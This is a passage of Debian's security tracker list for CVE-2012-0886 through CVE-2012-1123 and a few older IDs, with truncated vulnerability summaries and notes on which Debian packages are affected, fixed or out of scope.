NOT-FOR-US: phxEventManager not in Debian CVE-2012-1123 (The mci_check_login function in api/soap/mc_api.php in the SOAP API in ...) {DSA-2500-1} - mantis 1.2.10-1 (bug #662858) CVE-2012-1122 (bug_actiongroup.php in MantisBT before 1.2.9 does not properly check ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669927) CVE-2012-1121 (MantisBT before 1.2.9 does not properly check permissions, which ...) - mantis 1.2.10-1 (low; bug #669926) [squeeze] - mantis (according to maintainer) CVE-2012-1120 (The SOAP API in MantisBT before 1.2.9 does not properly enforce the ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669925) CVE-2012-1119 (MantisBT before 1.2.9 does not audit when users copy or clone a bug ...) 
{DSA-2500-1} - mantis 1.2.10-1 (low; bug #669928) CVE-2012-1118 (The access_has_bug_level function in core/access_api.php in MantisBT ...) {DSA-2500-1} - mantis 1.2.10-1 (low; bug #669924) CVE-2012-1117 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.0 and 2.5.1 ...) - joomla (bug #571794) CVE-2012-1116 (SQL injection vulnerability in Joomla! 1.7.x and 2.5.x before 2.5.2 ...) - joomla (bug #571794) CVE-2012-1115 RESERVED - phpldapadmin 1.2.2-3 (low; bug #662050) - ldap-account-manager 3.6-2 (low; bug #661904) [squeeze] - ldap-account-manager (Minor issue) CVE-2012-1114 RESERVED - phpldapadmin 1.2.2-3 (low; bug #662050) - ldap-account-manager 3.6-2 (low; bug #661904) [squeeze] - ldap-account-manager (Minor issue) CVE-2012-1113 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) - gallery2 2.3.2.dfsg-1 (low) [squeeze] - gallery2 (Minor issue) CVE-2012-1112 (Directory traversal vulnerability in Open-Realty CMS 2.5.8 and earlier ...) NOT-FOR-US: OpenRealty CMS not in Debian CVE-2012-1111 RESERVED - lightdm 1.0.9-1 (bug #658678) CVE-2012-1110 (Multiple cross-site scripting (XSS) vulnerabilities in Etano 1.22 and ...) NOT-FOR-US: etano not in Debian CVE-2012-1109 RESERVED NOT-FOR-US: mwlib not in Debian CVE-2012-1108 (The parse function in ogg/xiphcomment.cpp in TagLib 1.7 and earlier ...) - taglib 1.7.1-1 (low; bug #662705) [squeeze] - taglib (Minor issue) CVE-2012-1107 (The analyzeCurrent function in ape/apeproperties.cpp in TagLib 1.7 and ...) - taglib 1.7.1-1 (low; bug #662705) [squeeze] - taglib (Minor issue) CVE-2012-1106 (The C handler plug-in in Automatic Bug Reporting Tool (ABRT), possibly ...) 
NOT-FOR-US: abrt is Red Hat / Fedora specific CVE-2012-1105 RESERVED - moodle (bug #662945) - glpi 0.80.7-2 (unimportant; bug #662944) NOTE: Only supported behind an authenticated HTTP zone CVE-2012-1104 RESERVED - moodle (bug #662945) - glpi 0.80.7-2 (unimportant; bug #662944) NOTE: Only supported behind an authenticated HTTP zone CVE-2012-1103 (emacs/notmuch-mua.el in Notmuch before 0.11.1, when using the Emacs ...) {DSA-2416-1} - notmuch 0.11.1-1 CVE-2012-1101 RESERVED - systemd 43-1 (bug #662029) CVE-2012-1100 RESERVED NOT-FOR-US: JBoss Operations Network CVE-2012-1099 (Cross-site scripting (XSS) vulnerability in ...) {DSA-2466-1} - ruby-actionpack-2.3 2.3.14-3 (bug #668607) - rails 2.3.14 NOTE: (code lives within ruby-actionpack in unstable) CVE-2012-1098 (Cross-site scripting (XSS) vulnerability in Ruby on Rails 3.0.x before ...) - ruby-actionpack-2.3 2.3.14-3 (bug #668977) - rails 2.3.14 [squeeze] - rails (Vulnerable code not present) NOTE: (code lives within ruby-actionpack in unstable) CVE-2012-1097 (The regset (aka register set) feature in the Linux kernel before ...) {DSA-2443-1} - linux-2.6 3.2.10-1 (low) CVE-2012-1096 RESERVED - network-manager (low; bug #684259) [wheezy] - network-manager (Minor issue) [squeeze] - network-manager (Minor issue) CVE-2012-1095 RESERVED - osc (unimportant) NOTE: This is ultimately a bug in the respectice terminal emulations and not a vulnerability in osc CVE-2012-1094 RESERVED NOT-FOR-US: mod_cluster CVE-2012-1093 [init script x11-common creates directories in insecure manner] RESERVED - xorg 1:7.6+12 (bug #661627) [squeeze] - xorg (maintainer suggests no-dsa; confirm) CVE-2012-1092 REJECTED CVE-2012-1091 REJECTED CVE-2012-1090 (The cifs_lookup function in fs/cifs/dir.c in the Linux kernel before ...) {DSA-2443-1} - linux-2.6 3.2.10-1 CVE-2012-1089 (Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 ...) 
NOT-FOR-US: Apache Wicket CVE-2012-1088 RESERVED - iproute 20120319-1 (unimportant) NOTE: 1st issue only exploitable at build time / 2nd issue just example script in iproute-doc CVE-2012-1087 (Cross-site scripting (XSS) vulnerability in the Post data records to ...) NOT-FOR-US: bc_post2facebook extension for TYPO3 CVE-2012-1086 (Cross-site scripting (XSS) vulnerability in the UrlTool (aeurltool) ...) NOT-FOR-US: aeurltool extension for TYPO3 CVE-2012-1085 (Unspecified vulnerability in the BE User Switch (beuserswitch) ...) NOT-FOR-US: beuserswitch for TYPO3 CVE-2012-1084 (Cross-site scripting (XSS) vulnerability in the BE User Switch ...) NOT-FOR-US: beuserswitch for TYPO3 CVE-2012-1083 (Cross-site request forgery (CSRF) vulnerability in the Terminal PHP ...) NOT-FOR-US: terminal extension TYPO3 CVE-2012-1082 (Cross-site scripting (XSS) vulnerability in the Terminal PHP Shell ...) NOT-FOR-US: terminal extension TYPO3 CVE-2012-1081 (Cross-site scripting (XSS) vulnerability in the Yet another Google ...) NOT-FOR-US: ya_googlesearch extension for TYPO3 CVE-2012-1080 (Cross-site scripting (XSS) vulnerability in the Euro Calculator ...) NOT-FOR-US: skt_eurocalc extension for TYPO3 CVE-2012-1079 (Unspecified vulnerability in the Webservices for TYPO3 ...) NOT-FOR-US: typo3_webservice extension for TYPO3 CVE-2012-1078 (The System Utilities (sysutils) extension 1.0.3 and earlier for TYPO3 ...) NOT-FOR-US: sysutils extension for TYPO3 CVE-2012-1077 (SQL injection vulnerability in the Post data records to facebook ...) NOT-FOR-US: bc_post2facebook extension for TYPO3 CVE-2012-1076 (Cross-site scripting (XSS) vulnerability in the Documents download ...) NOT-FOR-US: rtg_files extension for TYPO3 CVE-2012-1075 (SQL injection vulnerability in the Documents download (rtg_files) ...) NOT-FOR-US: rtg_files extension for TYPO3 CVE-2012-1074 (SQL injection vulnerability in the White Papers (mm_whtppr) extension ...) 
NOT-FOR-US: mm_whtppr extension for TYPO3 CVE-2012-1073 (Cross-site scripting (XSS) vulnerability in the Category-System ...) NOT-FOR-US: toi_category extension for TYPO3 CVE-2012-1072 (SQL injection vulnerability in the Category-System (toi_category) ...) NOT-FOR-US: toi_category extension for TYPO3 CVE-2012-1071 (SQL injection vulnerability in the Kitchen recipe (mv_cooking) ...) NOT-FOR-US: mv_cooking extension for TYPO3 CVE-2012-1070 (Cross-site scripting (XSS) vulnerability in the Modern FAQ (irfaq) ...) NOT-FOR-US: irfaq extension for TYPO3 CVE-2012-1069 (Cross-site scripting (XSS) vulnerability in module/kb/search_word in ...) NOT-FOR-US: lknSupport CVE-2012-1068 (Cross-site scripting (XSS) vulnerability in the rc_ajax function in ...) NOT-FOR-US: WP-RecentComments plugin for WordPress CVE-2012-1067 (SQL injection vulnerability in the WP-RecentComments plugin 2.0.7 for ...) NOT-FOR-US: WP-RecentComments plugin for WordPress CVE-2012-1066 (Cross-site scripting (XSS) vulnerability in the template module in ...) NOT-FOR-US: SmartyCMS CVE-2012-1065 (Insecure method vulnerability in TuxScripting.dll in the TuxSystem ...) NOT-FOR-US: TuxSystem CVE-2012-1064 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...) NOT-FOR-US: EMC RSA Archer CVE-2011-5080 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: jftcaforms extension for TYPO3 CVE-2011-5079 (Open redirect vulnerability in the Modern FAQ (irfaq) extension 1.1.2 ...) NOT-FOR-US: irfaq extension for TYPO3 CVE-2010-5085 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Hulihan Amethyst CVE-2010-5084 (The cross-site request forgery (CSRF) protection mechanism in e107 ...) NOT-FOR-US: e107 CVE-2010-5083 (SQL injection vulnerability in the Web_Links module for PHP-Nuke 8.0 ...) NOT-FOR-US: PHP-Nuke CVE-2012-1063 (Multiple SQL injection vulnerabilities in ManageEngine Applications ...) 
NOT-FOR-US: ManageEngine Applications Manager CVE-2012-1062 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine Applications Manager CVE-2012-1061 (SQL injection vulnerability in GForge Advanced Server 6.0.0 and other ...) NOT-FOR-US: GForge Advanced Server CVE-2012-1060 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Taxonomy module for Drupal CVE-2012-1059 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: shirt module in OSCommerce CVE-2012-1058 (Cross-site request forgery (CSRF) vulnerability in Flyspray 0.9.9.6 ...) NOT-FOR-US: Flyspray CVE-2012-1057 (Cross-site request forgery (CSRF) vulnerability in the clickthrough ...) NOT-FOR-US: Forward module for Drupal CVE-2012-1056 (The Forward module 6.x-1.x before 6.x-1.21 and 7.x-1.x before 7.x-1.3 ...) NOT-FOR-US: Forward module for Drupal CVE-2012-1055 (Heap-based buffer overflow in PhotoLine 17.01 and possibly other ...) NOT-FOR-US: PhotoLine CVE-2012-1054 (Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet ...) {DSA-2419-1} - puppet 2.7.11-1 CVE-2012-1053 (The change_user method in the SUIDManager ...) {DSA-2419-1} - puppet 2.7.11-1 CVE-2012-1052 (Buffer overflow in IvanView 1.2.15 allows remote attackers to execute ...) NOT-FOR-US: IvanView CVE-2012-1051 (Heap-based buffer overflow in Xjp2.dll in the JPEG2000 plug-in in ...) NOT-FOR-US: XnView CVE-2012-1050 (Directory traversal vulnerability in Mathopd 1.4.x and 1.5.x before ...) - mathopd (low; bug #660627) [lenny] - mathopd (Minor issue, configuration specific) [squeeze] - mathopd (Minor issue, configuration specific) NOTE: this is only an issue in specific configurations but not in the Debian configuration CVE-2012-1049 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine ADManager Plus CVE-2012-1048 (Cross-site scripting (XSS) vulnerability in ...) 
NOT-FOR-US: eFront Community++ CVE-2012-1047 (Directory traversal vulnerability in the WWWHELP Service ...) NOT-FOR-US: Cyberoam Central Console CVE-2012-1046 (Cross-site scripting (XSS) vulnerability in TM1 Web in IBM Cognos TM1 ...) NOT-FOR-US: IBM Cognos CVE-2012-1045 RESERVED CVE-2012-1044 RESERVED CVE-2012-1043 RESERVED CVE-2012-1042 RESERVED CVE-2012-1041 RESERVED CVE-2012-1040 RESERVED CVE-2012-1039 (Multiple cross-site scripting (XSS) vulnerabilities in Dotclear before ...) - dotclear 2.4.2+dfsg-1 CVE-2012-1038 (Cross-site scripting (XSS) vulnerability in the WebAAA login ...) NOT-FOR-US: Juniper CVE-2012-1037 (PHP remote file inclusion vulnerability in front/popup.php in GLPI ...) - glpi 0.80.7-1 (bug #659383; unimportant) [squeeze] - glpi (Introduced in 0.78) NOTE: Only supported behind an authenticated HTTP zone CVE-2012-1036 (Cross-site scripting (XSS) vulnerability in the telerik HTML editor in ...) NOT-FOR-US: telerik CVE-2012-1035 (AdaCore Ada Web Services (AWS) before 2.10.2 computes hash values for ...) NOT-FOR-US: AdaCore Ada Web Services CVE-2011-5078 (The web administration interface in the server in Sybase M-Business ...) NOT-FOR-US: Sybase CVE-2012-1034 (Multiple cross-site scripting (XSS) vulnerabilities in the admin ...) NOT-FOR-US: EPiServer CMS CVE-2012-1033 (The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server ...) - bind9 1:9.8.1.dfsg.P1-4.1 (low) [squeeze] - bind9 (low-severity dns protocol design flaw) CVE-2012-1032 RESERVED CVE-2012-1031 (Unspecified vulnerability in EPiServer CMS 5 and 6 through 6R2, in ...) NOT-FOR-US: EPiServer CMS CVE-2012-1030 (Cross-site scripting (XSS) vulnerability in DotNetNuke 6.x through ...) NOT-FOR-US: DotNetNuke CVE-2012-1029 (SQL injection vulnerability in mobile/search/index.php in Tube Ace ...) NOT-FOR-US: Tube Ace CVE-2012-1028 (Cross-site scripting (XSS) vulnerability in bin/index.php in ...) 
NOT-FOR-US: SimpleGroupWare CVE-2012-1027 (Cross-site scripting (XSS) vulnerability in account-closed.tcl in ...) NOT-FOR-US: project-open CVE-2012-1026 (Multiple SQL injection vulnerabilities in login2.php in XRay CMS 1.1.1 ...) NOT-FOR-US: XRay CMS CVE-2012-1025 (Absolute path traversal vulnerability in file in Enigma2 Webinterface ...) NOT-FOR-US: Enigma2 CVE-2012-1024 (Directory traversal vulnerability in file in Enigma2 Webinterface ...) NOT-FOR-US: Enigma2 CVE-2012-1023 (Open redirect vulnerability in admin/index.php in 4images 1.7.10 ...) NOT-FOR-US: 4images CVE-2012-1022 (SQL injection vulnerability in admin/categories.php in 4images 1.7.10 ...) NOT-FOR-US: 4images CVE-2012-1021 (Cross-site scripting (XSS) vulnerability in admin/categories.php in ...) NOT-FOR-US: 4images CVE-2012-1020 (Multiple cross-site scripting (XSS) vulnerabilities in login.php in ...) NOT-FOR-US: NexorONE Online Banking CVE-2012-1019 (Multiple cross-site scripting (XSS) vulnerabilities in XWiki ...) NOT-FOR-US: Xwiki Enterprise CVE-2012-1018 (Cross-site scripting (XSS) vulnerability in includes/convert.php in ...) NOT-FOR-US: Joomla addon CVE-2012-1017 (Multiple SQL injection vulnerabilities in base_qry_main.php in Basic ...) - acidbase (low; bug #659287) [squeeze] - acidbase (Minor issue) CVE-2012-1016 (The pkinit_server_return_padata function in ...) - krb5 1.10.1+dfsg-4+nmu1 (bug #702633) [squeeze] - krb5 (introduced upstream with 3725d22140c23a376dd79b69d130be8e2b91005f, not affecting 1.8.x) CVE-2012-1015 (The kdc_handle_protected_negotiation function in the Key Distribution ...) {DSA-2518-1} - krb5 1.10.1+dfsg-2 (bug #683429) NOTE: http://seclists.org/bugtraq/2012/Jul/171 CVE-2012-1014 (The process_as_req function in the Key Distribution Center (KDC) in ...) {DSA-2518-1} - krb5 1.10.1+dfsg-2 (bug #683429) NOTE: http://seclists.org/bugtraq/2012/Jul/171 CVE-2012-1013 (The check_1_6_dummy function in lib/kadm5/srv/svr_principal.c in ...) 
- krb5 1.10.1+dfsg-3 (low; bug #687647) [squeeze] - krb5 (Minor issue) NOTE: DoS only triggered by clients with admin permissions CVE-2012-1012 (server/server_stubs.c in the kadmin protocol implementation in MIT ...) - krb5 1.10.1+dfsg-1 (bug #670918) [squeeze] - krb5 (vulnerable code not present) NOTE: bug was introduced in krb5 1.10 CVE-2012-1011 (actions.php in the AllWebMenus plugin 1.1.8 for WordPress allows ...) NOT-FOR-US: Wordpress plugin CVE-2012-1010 (Unrestricted file upload vulnerability in actions.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2011-5077 (Unrestricted file upload vulnerability in attachement.php in HDWiki ...) NOT-FOR-US: HDWiki CVE-2011-5076 (SQL injection vulnerability in model/comment.class.php in HDWiki 5.0, ...) NOT-FOR-US: HDWiki CVE-2012-1009 (NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build ...) NOT-FOR-US: NetSarang CVE-2012-1008 (OfficeSIP Server 3.1 allows remote attackers to cause a denial of ...) NOT-FOR-US: OfficeSIP Server CVE-2012-1007 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts ...) - libstruts1.2-java (unimportant; bug #657870) NOTE: Just examples CVE-2012-1006 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts ...) - libstruts1.2-java (Only affects Struts 2) CVE-2012-1005 (Multiple cross-site scripting (XSS) vulnerabilities in Sphinx Software ...) NOT-FOR-US: Sphinx Software Mobile Web Server CVE-2012-1004 (Multiple cross-site scripting (XSS) vulnerabilities in UI/Register.pm ...) - foswiki (bug #509864) CVE-2012-1003 (Multiple integer overflows in Opera 11.60 and earlier allow remote ...) NOT-FOR-US: Opera CVE-2002-2483 - linux-2.6 2.4.20 CVE-2012-1002 (Unspecified vulnerability in OpenConf 4.x before 4.12 has unknown ...) NOT-FOR-US: OpenConf CVE-2012-1001 RESERVED CVE-2012-1000 (Multiple cross-site scripting (XSS) vulnerabilities in LEPTON 1.1.3 ...) 
NOT-FOR-US: LEPTON CVE-2012-0999 (SQL injection vulnerability in modules/news/rss.php in LEPTON before ...) NOT-FOR-US: LEPTON CVE-2012-0998 (Directory traversal vulnerability in account/preferences.php in LEPTON ...) NOT-FOR-US: LEPTON CVE-2012-0997 (Cross-site request forgery (CSRF) vulnerability in admin/index.php in ...) NOT-FOR-US: 11in1 CVE-2012-0996 (Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable ...) NOT-FOR-US: 11in1 CVE-2012-0995 (Multiple cross-site scripting (XSS) vulnerabilities in ZENphoto 1.4.2 ...) NOT-FOR-US: ZENphoto CVE-2012-0994 (SQL injection vulnerability in the Manage Albums feature in ...) NOT-FOR-US: ZENphoto CVE-2012-0993 (Eval injection vulnerability in ...) NOT-FOR-US: ZENphoto CVE-2012-0992 (interface/fax/fax_dispatch.php in OpenEMR 4.1.0 allows remote ...) NOT-FOR-US: OpenEMR CVE-2012-0991 (Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow ...) NOT-FOR-US: OpenEMR CVE-2012-0990 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: DClassifieds CVE-2012-0989 (Cross-site scripting (XSS) vulnerability in OneOrZero AIMS 2.8.0 Trial ...) NOT-FOR-US: OneOrZero AIMS CVE-2012-0988 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: KnowledgeTree CVE-2012-0987 (Directory traversal vulnerability in edituser.php in ImpressCMS 1.2.x ...) NOT-FOR-US: ImpressCMS CVE-2012-0986 (Multiple cross-site scripting (XSS) vulnerabilities in ImpressCMS ...) NOT-FOR-US: ImpressCMS CVE-2012-0985 (Multiple buffer overflows in the Wireless Manager ActiveX control ...) NOT-FOR-US: Sony VAIO wireless LAN management ActiveX CVE-2012-0984 RESERVED CVE-2012-0983 (SQL injection vulnerability in Scriptsez.net Ez Album allows remote ...) NOT-FOR-US: Ez Album CVE-2012-0982 (SQL injection vulnerability in search.php in Vastal I-Tech Agent Zone ...) NOT-FOR-US: Vastal I-Tech Agent Zone CVE-2012-0981 (Directory traversal vulnerability in phpShowtime 2.0 allows remote ...) 
NOT-FOR-US: phpShowtime CVE-2012-0980 (SQL injection vulnerability in download.php in phux Download Manager ...) NOT-FOR-US: phux.org Download Manager CVE-2012-0979 (Cross-site scripting (XSS) vulnerability in TWiki allows remote ...) - twiki CVE-2012-0978 (Stack-based buffer overflow in npjp2.dll in LuraWave JP2 Browser ...) NOT-FOR-US: LuraWave JP2 Browser Plug-In CVE-2012-0977 (Stack-based buffer overflow in jp2_x.dll in LuraWave JP2 ActiveX ...) NOT-FOR-US: LuraWave JP2 ActiveX Control CVE-2012-0976 (Cross-site scripting (XSS) vulnerability in admin/EditForm in ...) - silverstripe (bug #528461) CVE-2012-0975 (Cross-site scripting (XSS) vulnerability in misc.php in Image Hosting ...) NOT-FOR-US: Image Hosting Script DPI CVE-2012-0974 (Multiple cross-site scripting (XSS) vulnerabilities in the getParam ...) NOT-FOR-US: OSClass CVE-2012-0973 (Multiple SQL injection vulnerabilities in OSClass before 2.3.5 allow ...) NOT-FOR-US: OSClass CVE-2012-0972 RESERVED CVE-2012-0971 RESERVED CVE-2012-0970 RESERVED CVE-2012-0969 RESERVED CVE-2012-0968 RESERVED CVE-2012-0967 RESERVED CVE-2012-0966 RESERVED CVE-2012-0965 RESERVED CVE-2012-0964 RESERVED CVE-2012-0963 RESERVED CVE-2012-0962 (Aptdaemon 0.43 in Ubuntu 11.10 and 12.04 LTS uses short IDs when ...) - aptdaemon 0.45-2 (low) [squeeze] - aptdaemon (Vulnerable code not present) NOTE: https://bugs.launchpad.net/software-center-agent/+bug/1052789 CVE-2012-0961 (Apt 0.8.16~exp5ubuntu13.x before 0.8.16~exp5ubuntu13.6, ...) - apt 0.9.7.7 (bug #695832) [squeeze] - apt (Logged as 0600 in Squeeze) CVE-2012-0960 (Unity integration extension (unity-firefox-extension) before 2.4.1 for ...) NOT-FOR-US: Ubuntu Unity extension CVE-2012-0959 (Remote Login Service (RLS) 1.0.0 does not properly clear account ...) NOT-FOR-US: Ubuntu remote login service CVE-2012-0958 (content/unity-api.js in the unity-firefox-extension extension 2.4.1 ...) 
	NOT-FOR-US: Firefox unity-firefox extension
CVE-2012-0957 (The override_release function in kernel/sys.c in the Linux kernel ...)
	- linux 3.2.32-1
	- linux-2.6
	[squeeze] - linux-2.6 (Introduced in 3.0)
	NOTE: https://lkml.org/lkml/2012/10/9/550
CVE-2012-0956 (ubiquity-slideshow-ubuntu before 58.2, during installation, allows ...)
	NOT-FOR-US: ubiquity-slideshow-ubuntu
CVE-2012-0955 RESERVED
CVE-2012-0954 (APT 0.7.x before 0.7.25 and 0.8.x before 0.8.16, when using the ...)
	- apt (unimportant)
	NOTE: net-update is not enabled by default in Debian
CVE-2012-0953 RESERVED
CVE-2012-0952 RESERVED
CVE-2012-0951 RESERVED
CVE-2012-0950 (The Apport hook (DistUpgradeApport.py) in Update Manager, as used by ...)
	- update-manager (Ubuntu-specific)
CVE-2012-0949 (The Apport hook in Update Manager as used by Ubuntu 12.04 LTS, 11.10, ...)
	- update-manager (Ubuntu-specific)
CVE-2012-0948 (DistUpgrade/DistUpgradeMain.py in Update Manager, as used by Ubuntu ...)
	- update-manager (Ubuntu-specific)
CVE-2012-0947 (Heap-based buffer overflow in the vqa_decode_chunk function in the VQA ...)
	{DSA-2471-1}
	- libav 6:0.8.2-1
	- ffmpeg
	NOTE: https://bugs.launchpad.net/ubuntu/+source/libav/+bug/980963
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/03/4
CVE-2012-0946 (The NVIDIA UNIX driver before 295.40 allows local users to access ...)
	- nvidia-graphics-drivers 295.40-1
	[squeeze] - nvidia-graphics-drivers 195.36.31-6squeeze1
CVE-2012-0945 RESERVED
CVE-2012-0944 (Aptdaemon 0.43 and earlier in Ubuntu 11.04, 11.10, and 12.04 LTS does ...)
	- aptdaemon 0.43+bzr790-1
	[squeeze] - aptdaemon (Vulnerable code not present)
CVE-2012-0943 RESERVED
	- lightdm (Ubuntu-specific script)
CVE-2012-0942 (Buffer overflow in rn5auth.dll in RealNetworks Helix Server and Helix ...)
	NOT-FOR-US: RealNetworks Helix
CVE-2012-0941 RESERVED
CVE-2012-0940 RESERVED
CVE-2012-0939 RESERVED
CVE-2012-0938 RESERVED
CVE-2012-0937 (** DISPUTED ** wp-admin/setup-config.php in the installation component ...)
	- wordpress (unimportant)
CVE-2012-0936 (Cross-site scripting (XSS) vulnerability in ...)
	- opennms (bug #450615)
CVE-2012-0935 (SQL injection vulnerability in Default.aspx in Aryadad CMS allows ...)
	NOT-FOR-US: Aryadad CMS
CVE-2012-0934 (PHP remote file inclusion vulnerability in ajax/savetag.php in the ...)
	NOT-FOR-US: Wordpress plug-in
CVE-2012-0933 (Multiple cross-site scripting (XSS) vulnerabilities in Acidcat CMS ...)
	NOT-FOR-US: Acidcat CMS
CVE-2012-0932 (Cross-site scripting (XSS) vulnerability in admin/login.php in Lead ...)
	NOT-FOR-US: Lead Capture Page System
CVE-2012-0931 (Schneider Electric Modicon Quantum PLC does not perform authentication ...)
	NOT-FOR-US: Schneider Electric Modicon Quantum PLC
CVE-2012-0930 (Cross-site scripting (XSS) vulnerability in Schneider Electric Modicon ...)
	NOT-FOR-US: Schneider Electric Modicon Quantum PLC
CVE-2012-0929 (Multiple buffer overflows in Schneider Electric Modicon Quantum PLC ...)
	NOT-FOR-US: Schneider Electric Modicon Quantum PLC
CVE-2012-0928 (The ATRAC codec in RealNetworks RealPlayer 11.x and 14.x through ...)
	NOT-FOR-US: RealPlayer
CVE-2012-0927 (Unspecified vulnerability in RealNetworks RealPlayer 11.x, 14.x, and ...)
	NOT-FOR-US: RealPlayer
CVE-2012-0926 (The RV10 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before ...)
	NOT-FOR-US: RealPlayer
CVE-2012-0925 (Unspecified vulnerability in the RV40 codec in RealNetworks RealPlayer ...)
	NOT-FOR-US: RealPlayer
CVE-2012-0924 (RealNetworks RealPlayer 11.x, 14.x, and 15.x before 15.02.71, and ...)
	NOT-FOR-US: RealPlayer
CVE-2012-0923 (The RV20 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before ...)
	NOT-FOR-US: RealPlayer
CVE-2012-0922 (rvrender.dll in RealNetworks RealPlayer 11.x, 14.x, and 15.x before ...)
	NOT-FOR-US: RealPlayer
CVE-2011-5075 (translate.php in Support Incident Tracker (aka SiT!) 3.45 through 3.65 ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5074 (Multiple cross-site request forgery (CSRF) vulnerabilities in Support ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5073 (Multiple cross-site scripting (XSS) vulnerabilities in Support ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5072 (Multiple SQL injection vulnerabilities in Support Incident Tracker ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5071 (Multiple SQL injection vulnerabilities in Support Incident Tracker ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5070 (Multiple cross-site scripting (XSS) vulnerabilities in Support ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5069 (Unrestricted file upload vulnerability in incident_attachments.php in ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5068 (Multiple cross-site request forgery (CSRF) vulnerabilities in Support ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2011-5067 (move_uploaded_file.php in Support Incident Tracker (aka SiT!) 3.65 ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2012-0921 RESERVED
CVE-2012-0920 (Use-after-free vulnerability in Dropbear SSH Server 0.52 through ...)
	{DSA-2456-1}
	- dropbear 2012.55-1 (low; bug #661150)
	NOTE: this is limited to authenticated users with enforced command restrictions
CVE-2012-0919 (Cross-site scripting (XSS) vulnerability in Hitachi IT Operations ...)
	NOT-FOR-US: Hitachi IT Operations Director
CVE-2012-0918 (Unspecified vulnerability in Hitachi COBOL2002 Net Developer, Net ...)
	NOT-FOR-US: Hitachi
CVE-2012-0917 (Cross-site scripting (XSS) vulnerability in Hitachi IT Operations ...)
	NOT-FOR-US: Hitachi IT Operations Analyzer
CVE-2012-0916 (Heap-based buffer overflow in RenRen Talk 2.9 allows remote attackers ...)
	NOT-FOR-US: RenRen Talk
CVE-2012-0915 (Integer signedness error in RenRen Talk 2.9 allows remote attackers to ...)
	NOT-FOR-US: RenRen Talk
CVE-2012-0914 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: admin view in the Panels module for Drupal
CVE-2012-0913 (SQL injection vulnerability in checklogin.aspx in ICloudCenter ...)
	NOT-FOR-US: ICloudCenter ICTimeAttendance
CVE-2012-0912 (SQL injection vulnerability in Stoneware webNetwork before 6.0.8.0 ...)
	NOT-FOR-US: Stoneware webNetwork
CVE-2012-0911 (TikiWiki CMS/Groupware before 6.7 LTS and before 8.4 allows remote ...)
	- tikiwiki
	NOTE: http://seclists.org/bugtraq/2012/Jul/19
CVE-2012-0910 RESERVED
CVE-2012-0909 (Cross-site scripting (XSS) vulnerability in Horde_Form in Horde ...)
	- horde3 3.3.12+debian0-2.2 (low)
	[squeeze] - horde3 (Minor issue)
CVE-2012-0907 (Directory traversal vulnerability in the web player in NeoAxis NeoAxis ...)
	NOT-FOR-US: NeoAxis NeoAxis web player
CVE-2012-0906 (SQL injection vulnerability in the Moviebase addon for deV!L'z ...)
	NOT-FOR-US: deV!L'z Clanportal
CVE-2012-0905 (SQL injection vulnerability in deV!L'z Clanportal (DZCP) Gamebase ...)
	NOT-FOR-US: deV!L'z Clanportal
CVE-2012-0904 (VLC media player 1.1.11 allows remote attackers to cause a denial of ...)
	- vlc (not reproducible, no public fix from the vlc team either)
CVE-2012-0903 (Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Desktop ...)
	NOT-FOR-US: Zimbra Desktop
CVE-2012-0902 (AirTies Air 4450 1.1.2.18 allows remote attackers to cause a denial of ...)
	NOT-FOR-US: AirTies Air
CVE-2012-0901 (Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo ...)
	NOT-FOR-US: YouSayToo auto-publishing plugin for WordPress
CVE-2012-0900 (Multiple cross-site scripting (XSS) vulnerabilities in Beehive Forum ...)
	NOT-FOR-US: Beehive Forum
CVE-2012-0899 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Annuaire PHP
CVE-2012-0898 (Directory traversal vulnerability in meb_download.php in the ...)
	NOT-FOR-US: myEASYbackup plugin for WordPress
CVE-2012-0897 (Stack-based buffer overflow in the JPEG2000 plugin in IrfanView ...)
	NOT-FOR-US: IrfanView PlugIns
CVE-2012-0896 (Absolute path traversal vulnerability in download.php in the Count Per ...)
	NOT-FOR-US: Count Per Day module for WordPress
CVE-2012-0895 (Cross-site scripting (XSS) vulnerability in map/map.php in the Count ...)
	NOT-FOR-US: Count Per Day module for WordPress
CVE-2012-0894 RESERVED
CVE-2012-0893 RESERVED
CVE-2012-0892 RESERVED
CVE-2012-0891 RESERVED
CVE-2012-0890 RESERVED
CVE-2012-0889 RESERVED
CVE-2012-0888 RESERVED
CVE-2012-0887 RESERVED
CVE-2012-0886 RESERVED
